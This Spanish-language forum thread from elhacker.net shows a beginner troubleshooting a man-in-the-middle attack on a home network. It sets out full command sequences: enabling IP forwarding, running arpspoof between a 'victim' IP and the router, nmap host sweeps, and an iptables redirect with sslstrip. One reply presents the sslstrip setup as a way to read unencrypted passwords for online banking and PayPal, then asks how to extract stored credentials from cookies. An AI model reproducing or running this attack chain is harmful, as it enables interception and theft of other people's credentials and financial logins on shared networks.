Foro de elhacker.net

buenas buenas! tengo un pequeño problema jeje a
ver si me pueden ayudar en algo--
primero voy a decirles como es que estoy tratando
de probar esto del Man in the middle, tengo 2 pc`s
con xp, ambas conectadas a un router y en una de
ellas tengo una maquina virtual con ubuntu.ok? bien ahora siguiendo los pasos de el pdf (MITM) que publicaron en este foro
hay una explicacion de 4 pasos:
1-sudo nano /proc/sys/net/ipv4/ip_forward
Cambiamos el 0 por 1
2-sudo wireshark –i [interface]
3-sudo arpspoof -i [interface] -t [ip_objetivo] [ip_router]
4-sudo arpspoof –i [interface] –t [ip_router]
[ip_objetivo]
en el paso 1 esta todo bien cambio los valores y
listo
ahora en el paso 2 mi duda esta en donde introduzco el comando sudo wireshark –i
[interface]  perdón por mi ignorancia pero en el
lugar de interface debo poner por ejemplo "etho" o
"lo" ??esa es mi primera duda en tal caso yo puse
"lo"
ahora en el paso 3 y 4 ingreso los comandos (ahi capaz arrastro el error del paso anterior donde dice
interface puse "lo") y me da este error.
"arpspoof : couldn`t arp for host 192.168.x.x "
si pudieran sacarme de este aprieto se los
agradeceria..
p/d: otra cosa en una parte del pdf dice "Para ver las direcciones IP que están conectadas a nuestra
red, podemos entrar a nuestro router desde el
navegador"
yo entre en el mio es un d-link y no hay un panel
de control ni una opcion para ver las pc conectadas
entre al router desde el navegador y solo me da opciones para cambiar algunas configuraciones
como por ejem la contraseña del wifi.
Un millon de gracias..

Te falta un poco de teoria de Linux y las redes...
Puede ser eth0 eth1 wlan0 etc...
El comando lo metes en la terminal, obviamente...

No, no es asi, como dije, necesitas leer un poco mas, aprende que es lo, eth0, wlan0, etc...


Podes usar NMAP:

nmap -sP 192.168.1.1-255
nmap -sP -PI 192.168.1.1-255

muchas gracias por la respuesta!!!y si es verdad estoy bastante verde todavia...tendre que leer mas..gracias por la ayuda..

Te explico como lo hago yo en Ubuntu 11.10 facil facil,Instalo aircrack,dsniff y sslstrip 0.9 (asi ves contraseñas sin cifrar y cifradas,http y https,bancos online,paypal,etc...)

Cuando lo tengas instalado,pones la terminal y añades : echo 1 > /proc/sys/net/ipv4/ip_forward

Luego añades: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Luego: arpspoof -i eth0/wlan0 -t IPVICTIMA IPROUTER y empezara el "ataque"

Ahora abres otra terminal sin cerrar la de antes y pones: sslstrip -w  nombredetuarchivo

Aqui empezara sslstrip 0.9 (sslstrip da el cambiazo a la victima que pide una pagina https,le da el cambiazo por la misma en http y ves la contraseña sin cifrar)

Luego para ver el ataque en "vivo" abre otra terminal,sin cerrar la de antes,y pones:

tail -f nombredetuarchivo y cuando al cvictima se meta en alguna pagina te saldra,tambien puedes poner en vez de tail -f,el wireshark,aunque para mi es un poco lioso.

Asi lo hago yo y me va de lujo,prueba contigo mismo y veras como te sale.

Aprovecho para hacer una pregunta,sabreis como hacer para pillar una pass y user que esta alojada en las cookies? una contraseña recordada vamos,osea hacer un mitm a mi mismo y verme mi pass en una pagina de logueo automatico,Gracias y saludos.

Una vez que entendes el wireshark no es tan lioso...
Y diria que hagas un nuevo post y no desvirtues el tema de nuestro amigo  :silbar: